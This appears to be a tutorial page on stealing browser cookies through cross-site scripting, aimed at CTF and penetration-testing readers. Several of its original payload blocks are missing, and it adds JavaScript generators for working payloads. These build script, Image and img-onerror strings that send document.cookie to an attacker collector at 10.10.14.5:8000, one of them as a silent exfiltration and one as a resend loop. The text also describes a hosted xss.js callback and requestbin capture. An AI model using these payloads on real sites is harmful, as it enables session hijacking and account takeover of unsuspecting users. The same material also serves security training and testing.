Stealing Cookies
Stealing cookies to obtain privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities. One caveat applies to every payload below: document.cookie only exposes cookies that were set without the HttpOnly flag, so an HttpOnly session cookie will never show up in what you exfiltrate.
Payloads
Verification with alert()
This payload pops an alert() box before sending the cookie. It is useful for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the alert() box is closed, the cookie is sent to the attacker-controlled server:
Exfiltrating cookies without alert()
After verifying that the parameter is susceptible to cross-site scripting, the following payload exfiltrates the cookies silently, without any visible indication to the victim:
CTF Only Payload
The following payload uses an img tag rather than a script tag. Its onerror handler points the image's src at your server; because the server's response is not a valid image, onerror fires again, and the cookie is resent in a loop, ultimately flooding your server with copies of it. I have found this can be life-saving in a CTF when things may not be working as the author originally intended:
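The three payload shapes described above (alert then send, silent send, and the img onerror loop), written as generators so the strings can be reviewed and tested before being pasted into the vulnerable parameter. This is an added example and not the payloads from the original page; the collector address http://10.10.14.5:8000/ and the window.n counter are assumptions, and an Image request is used for the silent variant because it needs no CORS permission and does not navigate the victim away.

```javascript
// Added example, not the payloads from the original page: generators for the
// three cookie-stealing payloads described above. The collector address
// (http://10.10.14.5:8000/) used when calling these is an assumption;
// substitute your own listener.

// URL the victim's browser will request. The cookie jar goes in the "c"
// query parameter, percent-encoded so ';', '=' and spaces survive the trip.
function buildExfilUrl(collector, cookie) {
  return collector + "?c=" + encodeURIComponent(cookie);
}

// JavaScript expression that builds the same URL inside the victim's page,
// where document.cookie is only known at run time.
function exfilExpr(collector) {
  return "'" + collector + "?c='+encodeURIComponent(document.cookie)";
}

// <script> payload. withAlert=true pops the cookie first (the verification
// step) and then redirects the victim to the collector; withAlert=false
// exfiltrates silently through an Image request, which needs no CORS
// permission and does not navigate the victim away from the page.
function scriptPayload(collector, withAlert) {
  const body = withAlert
    ? "alert(document.cookie);document.location=" + exfilExpr(collector)
    : "new Image().src=" + exfilExpr(collector);
  return "<script>" + body + "</script>";
}

// <img> payload for filters that block <script>. src=x cannot load, so
// onerror fires and points src at the collector; the collector's reply is
// not an image either, so onerror fires again and the cookie is resent over
// and over. That is the loop the text mentions. maxSends bounds it with a
// counter on window (assumed name window.n); pass Infinity to keep the
// unbounded CTF behaviour.
function imgPayload(collector, maxSends) {
  const handler =
    "window.n=(window.n||0)+1;" +
    "if(window.n<=" + maxSends + ")this.src=" + exfilExpr(collector);
  return '<img src=x onerror="' + handler + '">';
}
```

Note that the alert variant navigates the victim to the collector, which is fine for a quick check but obvious to the user; the silent variant and the img variant leave the page in place.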
My Preferred Method
The way that I like to go about capturing cookies is submitting the following payload, which calls back to a JavaScript file that I host on a Python web server:
The xss.js file looks like the following. Ultimately it does the same as the above payloads: it grabs the cookies and sends them to my hosted web server:
Capturing the Cookies
Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or a Burp Collaborator instance that you control. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That being said, there are sites such as requestbin that you can send the request to: